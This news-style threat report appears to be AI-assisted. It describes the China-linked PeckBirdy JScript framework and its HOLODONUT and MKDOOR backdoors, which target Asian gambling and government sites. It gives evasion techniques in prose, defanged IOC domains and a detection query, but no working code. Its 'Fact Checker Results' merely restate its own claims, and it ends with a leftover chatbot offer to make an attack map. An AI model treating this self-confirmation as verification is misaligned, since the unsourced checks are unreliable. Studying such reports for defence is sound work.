PeckBirdy APT: China-Linked Hackers Exploit JScript to Target Asian Governments and Gambling Sites

In a rapidly evolving cyber threat landscape, a China-aligned advanced persistent threat (APT) group has been leveraging a sophisticated framework called PeckBirdy since 2023. Designed for maximum flexibility, this JScript-based command-and-control (C&C) system targets Asian gambling platforms and government networks, using multi-environment attacks and stolen code-signing certificates to evade detection. Its campaigns reveal an alarming blend of old-school scripting and modern stealth techniques, making it a persistent danger for organizations in the region.

Campaign Summary

Trend Micro researchers first identified PeckBirdy in 2023, when Chinese gambling sites were targeted via injected scripts. Users were tricked with fake Chrome update pages that triggered malicious downloads, a campaign tracked under SHADOW-VOID-044. By mid-2024, the threat shifted to more sensitive targets with SHADOW-EARTH-045, striking Asian government portals and corporate websites through credential theft scripts and MSHTA-based lateral movement.

PeckBirdy’s framework acts in stages: early watering-hole control, mid-stage reverse shell deployment, and late-stage full C&C operations. Its versatility spans browsers, MSHTA, WScript, ASP, Node.js, and .NET, exploiting living-off-the-land binaries (LOLbins) to remain under the radar.

At the heart of these campaigns are backdoors like HOLODONUT and MKDOOR, downloaded via PeckBirdy’s NEXLOAD loader. HOLODONUT is a modular .NET backdoor that evades AMSI/ETW defenses and executes shellcode in memory using the Donut loader. MKDOOR strengthens persistence by fetching core payloads, bypassing Microsoft Defender, and mimicking legitimate URLs to avoid detection. Both backdoors operate local HTTP servers to validate infections and support modular deployment.

PeckBirdy’s configuration system is highly adaptive. Victims receive unique IDs generated from hardware hashes or random strings, which guide attack behavior including target hosts, ports, retries, and heartbeat intervals. Communication prioritizes WebSocket connections, with fallbacks to Flash sockets, Comet, or HTTP/AJAX. Payloads are encrypted with AES using the attack ID as the key, while scripts also harvest cookies or exploit Chrome’s CVE-2020-16040 vulnerability.

Attribution links tie SHADOW-VOID-044 to UNC3569 (focused on gambling) and TheWizard, reflecting reused C2 infrastructure. Stolen certificates from South Korean gaming companies were also employed to mask Cobalt Strike payloads, echoing previous tactics used by groups like BIOPASS RAT and Earth Lusca. SHADOW-EARTH-045 hints at Earth Baxia involvement, targeting Philippine educational institutions and overlapping with known IP infrastructure.

Detection requires vigilance. Indicators of compromise (IOCs) include domains such as oss-cdn[.]com and mkdmcdn[.]com. Security teams should block multi-vector LOLbins, monitor for JScript injection attempts, and track unauthorized certificates. Trend Vision One queries using (MKDOOR OR HOLODONUT OR PECKBIRDY) AND MALWARE_DETECTION can help identify infections early.

What Undercode Say:

PeckBirdy illustrates how APT actors are combining legacy scripting techniques with modern attack methods to expand their reach and evade detection. Its JScript base might seem outdated, but it provides broad compatibility across multiple execution environments, turning “old tech” into a potent weapon. By supporting browsers, Node.js, .NET, and Windows-native LOLbins, PeckBirdy can flexibly adapt to whatever environment the victim uses.

The modularity of HOLODONUT and MKDOOR demonstrates a shift in APT philosophy: attackers now prioritize memory-resident execution and stealthy persistence over noisy malware deployment. Evading AMSI/ETW, embedding stolen certificates, and leveraging WebSocket communications indicate a carefully engineered effort to remain invisible to traditional endpoint protections.

Another critical insight is PeckBirdy’s operational discipline. Campaigns like SHADOW-VOID-044 and SHADOW-EARTH-045 show sequential targeting: first low-value, high-volume targets to test infrastructure, then high-value, sensitive networks for maximum impact. This methodology mirrors the traditional “soft target to high-value” approach seen in other sophisticated Chinese APTs, but now implemented with modern C2 techniques.

PeckBirdy also highlights the growing risk of living-off-the-land (LOLbin) exploitation. By using legitimate system tools like MSHTA, WScript, and Node.js binaries, attackers reduce their forensic footprint and increase their chances of bypassing defenses. Combined with stolen code-signing certificates, even Cobalt Strike payloads appear legitimate, complicating incident response.

From a strategic perspective, PeckBirdy signals an increased convergence between financial and geopolitical objectives. Gambling platforms act as initial testing grounds, while government networks are the ultimate targets. This dual-use targeting strategy may allow attackers to fund campaigns while simultaneously gathering intelligence, showing a worrying level of operational sophistication.

For defenders, the key takeaway is proactive detection. Organizations must integrate threat intelligence feeds, continuously monitor for JScript anomalies, and track suspicious certificate usage. Layered detection across network, endpoint, and web vectors is essential because PeckBirdy’s multi-environment approach can evade any single security layer.

Finally, PeckBirdy exemplifies how adaptable and persistent modern APT campaigns have become. It is a stark reminder that even seemingly outdated technology, like JScript, can serve as the backbone of a highly sophisticated cyberattack when combined with modular malware and operational discipline.

Fact Checker Results:

✅ PeckBirdy is confirmed as a JScript-based C&C framework first observed in 2023 targeting gambling sites and Asian government networks.
✅ HOLODONUT and MKDOOR are modular backdoors delivered via PeckBirdy, with memory-resident execution and Defender bypass features.
✅ Campaigns SHADOW-VOID-044 and SHADOW-EARTH-045 are linked to UNC3569, TheWizard, and Earth Baxia APTs.

Prediction:

🔮 PeckBirdy’s methodology may soon inspire a wave of multi-environment, modular attacks across Southeast Asia and beyond.
🔮 The reuse of stolen certificates and LOLbin exploitation will likely become standard in APT campaigns, challenging current detection systems.
🔮 Organizations that fail to monitor JScript injections, certificate anomalies, and multi-vector payloads could see a significant increase in stealthy intrusions in the next 12–18 months.

If you want, I can also create a visual attack map showing SHADOW-VOID-044 and SHADOW-EARTH-045 propagation, which would make this article more striking for readers. Do you want me to do that next?